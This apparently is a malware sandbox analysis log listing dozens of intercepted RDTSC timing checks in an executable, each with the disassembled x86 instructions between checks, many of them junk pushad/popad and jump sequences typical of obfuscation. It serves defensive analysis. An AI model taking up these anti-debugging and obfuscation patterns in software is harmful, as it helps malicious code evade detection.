Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C70D44 second address: 4C70D6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esp 0x00000009 jmp 00007F6969412EACh 0x0000000e mov dword ptr [esp], ebp 0x00000011 pushad 0x00000012 pushad 0x00000013 call 00007F6969412EACh 0x00000018 pop eax 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C502F4 second address: 4C50322 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop ebx 0x00000006 popad 0x00000007 pushad 0x00000008 mov ecx, 56A5488Bh 0x0000000d mov si, E267h 0x00000011 popad 0x00000012 popad 0x00000013 push eax 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F6968D54748h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C50322 second address: 4C503A2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, 1074h 0x00000007 mov si, di 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebp 0x0000000e pushad 0x0000000f call 00007F6969412EB5h 0x00000014 pushfd 0x00000015 jmp 00007F6969412EB0h 0x0000001a sub ecx, 394E0558h 0x00000020 jmp 00007F6969412EABh 0x00000025 popfd 0x00000026 pop eax 0x00000027 push edi 0x00000028 mov ecx, 04A3782Bh 0x0000002d pop esi 0x0000002e popad 0x0000002f mov ebp, esp 0x00000031 push eax 0x00000032 push edx 0x00000033 pushad 0x00000034 mov dx, ax 0x00000037 pushfd 0x00000038 jmp 00007F6969412EB4h 0x0000003d sub ecx, 0AE9D6E8h 0x00000043 jmp 00007F6969412EABh 0x00000048 popfd 0x00000049 popad 0x0000004a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C503A2 second address: 4C503A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C503A8 second address: 4C503F2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6969412EABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [ebp+08h] 0x0000000e pushad 0x0000000f mov esi, 7C22C7EBh 0x00000014 pushfd 0x00000015 jmp 00007F6969412EB0h 0x0000001a sub eax, 195F3478h 0x00000020 jmp 00007F6969412EABh 0x00000025 popfd 0x00000026 popad 0x00000027 and dword ptr [eax], 00000000h 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d mov ax, di 0x00000030 mov bl, 2Ah 0x00000032 popad 0x00000033 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C503F2 second address: 4C5040A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6968D54744h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C304B0 second address: 4C304D5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6969412EB1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b call 00007F6969412EACh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C304D5 second address: 4C304E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 mov cx, dx 0x00000008 popad 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C304E4 second address: 4C304EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov bl, 02h 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C40D88 second address: 4C40DAE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6968D54741h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F6968D5473Dh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C5017C second address: 4C501E4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 3AF89452h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov ebp, esp 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007F6969412EB5h 0x00000016 sbb esi, 5ADFFB26h 0x0000001c jmp 00007F6969412EB1h 0x00000021 popfd 0x00000022 pushfd 0x00000023 jmp 00007F6969412EB0h 0x00000028 or si, 6CC8h 0x0000002d jmp 00007F6969412EABh 0x00000032 popfd 0x00000033 popad 0x00000034 pop ebp 0x00000035 push eax 0x00000036 push edx 0x00000037 push eax 0x00000038 push edx 0x00000039 push eax 0x0000003a push edx 0x0000003b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C501E4 second address: 4C501E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C501E8 second address: 4C501EE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C706E9 second address: 4C706ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C706ED second address: 4C706F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C706F1 second address: 4C706FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 test eax, eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C706FF second address: 4C70711 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov ecx, ebx 0x00000008 popad 0x00000009 je 00007F69DBB56104h 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C70847 second address: 4C7084B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C7084B second address: 4C7084F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C7084F second address: 4C70855 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C70855 second address: 4C70883 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6969412EADh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F6969412EB8h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C70883 second address: 4C70889 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C70889 second address: 4C7089A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6969412EADh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C7089A second address: 4C7089E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C7089E second address: 4C708BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a jmp 00007F6969412EADh 0x0000000f pop ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C708BB second address: 4C708C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C2008F second address: 4C200F0 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F6969412EAAh 0x00000008 sub cx, 17B8h 0x0000000d jmp 00007F6969412EABh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 popad 0x00000016 and esp, FFFFFFF8h 0x00000019 pushad 0x0000001a mov dl, ah 0x0000001c mov dx, 0194h 0x00000020 popad 0x00000021 push ebp 0x00000022 jmp 00007F6969412EB8h 0x00000027 mov dword ptr [esp], ecx 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007F6969412EB7h 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C200F0 second address: 4C200F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C200F6 second address: 4C200FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C200FA second address: 4C201AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esp 0x00000009 jmp 00007F6968D5473Ch 0x0000000e mov dword ptr [esp], ebx 0x00000011 jmp 00007F6968D54740h 0x00000016 mov ebx, dword ptr [ebp+10h] 0x00000019 pushad 0x0000001a mov di, ax 0x0000001d mov dx, ax 0x00000020 popad 0x00000021 xchg eax, esi 0x00000022 pushad 0x00000023 pushfd 0x00000024 jmp 00007F6968D54742h 0x00000029 jmp 00007F6968D54745h 0x0000002e popfd 0x0000002f movzx esi, di 0x00000032 popad 0x00000033 push eax 0x00000034 pushad 0x00000035 mov ax, AD4Fh 0x00000039 mov dl, al 0x0000003b popad 0x0000003c xchg eax, esi 0x0000003d pushad 0x0000003e call 00007F6968D5473Dh 0x00000043 pushfd 0x00000044 jmp 00007F6968D54740h 0x00000049 and ax, 9D28h 0x0000004e jmp 00007F6968D5473Bh 0x00000053 popfd 0x00000054 pop ecx 0x00000055 mov si, dx 0x00000058 popad 0x00000059 mov esi, dword ptr [ebp+08h] 0x0000005c push eax 0x0000005d push edx 0x0000005e push eax 0x0000005f push edx 0x00000060 jmp 00007F6968D5473Dh 0x00000065 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C201AF second address: 4C201C4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6969412EB1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C201C4 second address: 4C201D7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, edx 0x00000005 movsx edi, cx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, edi 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push edi 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C201D7 second address: 4C201DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C201DC second address: 4C201FD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6968D54746h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C201FD second address: 4C20201 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C20201 second address: 4C2021D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6968D54748h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C2021D second address: 4C202FE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6969412EABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a jmp 00007F6969412EB6h 0x0000000f test esi, esi 0x00000011 jmp 00007F6969412EB0h 0x00000016 je 00007F69DBBA1266h 0x0000001c pushad 0x0000001d movzx ecx, di 0x00000020 mov dx, F94Eh 0x00000024 popad 0x00000025 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000002c jmp 00007F6969412EB5h 0x00000031 je 00007F69DBBA1251h 0x00000037 pushad 0x00000038 mov si, 93F3h 0x0000003c pushfd 0x0000003d jmp 00007F6969412EB8h 0x00000042 adc esi, 2856D8F8h 0x00000048 jmp 00007F6969412EABh 0x0000004d popfd 0x0000004e popad 0x0000004f mov edx, dword ptr [esi+44h] 0x00000052 pushad 0x00000053 jmp 00007F6969412EB4h 0x00000058 jmp 00007F6969412EB2h 0x0000005d popad 0x0000005e or edx, dword ptr [ebp+0Ch] 0x00000061 push eax 0x00000062 push edx 0x00000063 jmp 00007F6969412EB7h 0x00000068 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2A006A8 second address: 2A006AE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2A006AE second address: 2A006EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, ax 0x00000006 call 00007F6969412EAEh 0x0000000b pop ecx 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov ebp, esp 0x00000011 jmp 00007F6969412EB1h 0x00000016 and esp, FFFFFFF8h 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F6969412EADh 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2A006EB second address: 2A00707 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6968D54741h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2A00707 second address: 2A0070D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2A0070D second address: 2A007AF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6968D54747h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007F6968D54749h 0x00000011 xchg eax, ebx 0x00000012 jmp 00007F6968D5473Eh 0x00000017 xchg eax, esi 0x00000018 jmp 00007F6968D54740h 0x0000001d push eax 0x0000001e jmp 00007F6968D5473Bh 0x00000023 xchg eax, esi 0x00000024 pushad 0x00000025 pushfd 0x00000026 jmp 00007F6968D54744h 0x0000002b add ah, 00000048h 0x0000002e jmp 00007F6968D5473Bh 0x00000033 popfd 0x00000034 mov ebx, ecx 0x00000036 popad 0x00000037 mov esi, dword ptr [ebp+08h] 0x0000003a push eax 0x0000003b push edx 0x0000003c jmp 00007F6968D54741h 0x00000041 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2A007AF second address: 2A00811 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F6969412EB7h 0x00000009 sbb ax, 94EEh 0x0000000e jmp 00007F6969412EB9h 0x00000013 popfd 0x00000014 call 00007F6969412EB0h 0x00000019 pop esi 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d mov ebx, 00000000h 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007F6969412EADh 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2A00811 second address: 2A0087B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6968D54741h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test esi, esi 0x0000000b pushad 0x0000000c call 00007F6968D5473Ch 0x00000011 call 00007F6968D54742h 0x00000016 pop eax 0x00000017 pop edx 0x00000018 call 00007F6968D54740h 0x0000001d pop edi 0x0000001e popad 0x0000001f je 00007F69DD6FA269h 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007F6968D54746h 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2A0087B second address: 2A0088A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6969412EABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2A0088A second address: 2A00890 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2A00890 second address: 2A008F5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6969412EABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b cmp dword ptr [esi+08h], DDEEDDEEh 0x00000012 pushad 0x00000013 mov bx, si 0x00000016 mov ch, 85h 0x00000018 popad 0x00000019 mov ecx, esi 0x0000001b jmp 00007F6969412EB3h 0x00000020 je 00007F69DDDB8985h 0x00000026 jmp 00007F6969412EB6h 0x0000002b test byte ptr [77436968h], 00000002h 0x00000032 push eax 0x00000033 push edx 0x00000034 push eax 0x00000035 push edx 0x00000036 jmp 00007F6969412EAAh 0x0000003b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2A008F5 second address: 2A008F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2A008F9 second address: 2A008FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2A008FF second address: 2A00905 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2A00905 second address: 2A00909 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2A00909 second address: 2A00947 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jne 00007F69DD6FA1DBh 0x0000000e jmp 00007F6968D54744h 0x00000013 mov edx, dword ptr [ebp+0Ch] 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F6968D54747h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2A00947 second address: 2A00968 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, cx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F6969412EB3h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2A00968 second address: 2A0096E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2A0096E second address: 2A00986 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6969412EABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2A00986 second address: 2A0098A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2A0098A second address: 2A00990 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2A00990 second address: 2A009A8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6968D5473Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2A009A8 second address: 2A009AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2A009AC second address: 2A009B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2A009B0 second address: 2A009B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2A009B6 second address: 2A009BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2A009BC second address: 2A00A2F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebx 0x00000009 jmp 00007F6969412EB8h 0x0000000e push eax 0x0000000f jmp 00007F6969412EABh 0x00000014 xchg eax, ebx 0x00000015 jmp 00007F6969412EB6h 0x0000001a push dword ptr [ebp+14h] 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 pushfd 0x00000021 jmp 00007F6969412EADh 0x00000026 or cx, 7DB6h 0x0000002b jmp 00007F6969412EB1h 0x00000030 popfd 0x00000031 movzx eax, dx 0x00000034 popad 0x00000035 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2A00A2F second address: 2A00A79 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, 6C9Fh 0x00000007 pushfd 0x00000008 jmp 00007F6968D54744h 0x0000000d sub ax, 8008h 0x00000012 jmp 00007F6968D5473Bh 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b push dword ptr [ebp+10h] 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F6968D54745h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2A00A98 second address: 2A00AA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ax, di 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2A00AA0 second address: 2A00AE6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F6968D54740h 0x00000009 xor cx, 9FF8h 0x0000000e jmp 00007F6968D5473Bh 0x00000013 popfd 0x00000014 jmp 00007F6968D54748h 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c pop esi 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2A00AE6 second address: 2A00AEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ax, di 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2A00AEE second address: 2A00AFD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6968D5473Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2A00AFD second address: 2A00B01 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2A00B01 second address: 2A00B58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F6968D5473Eh 0x00000012 and cx, 0BE8h 0x00000017 jmp 00007F6968D5473Bh 0x0000001c popfd 0x0000001d pushfd 0x0000001e jmp 00007F6968D54748h 0x00000023 or ax, 9E48h 0x00000028 jmp 00007F6968D5473Bh 0x0000002d popfd 0x0000002e popad 0x0000002f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2A00B58 second address: 2A00B5E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C20A69 second address: 4C20A6F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C20A6F second address: 4C20A73 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C20A73 second address: 4C20A90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F6968D54740h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C20A90 second address: 4C20A94 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C20A94 second address: 4C20A9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C909BF second address: 4C909D2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6969412EAFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
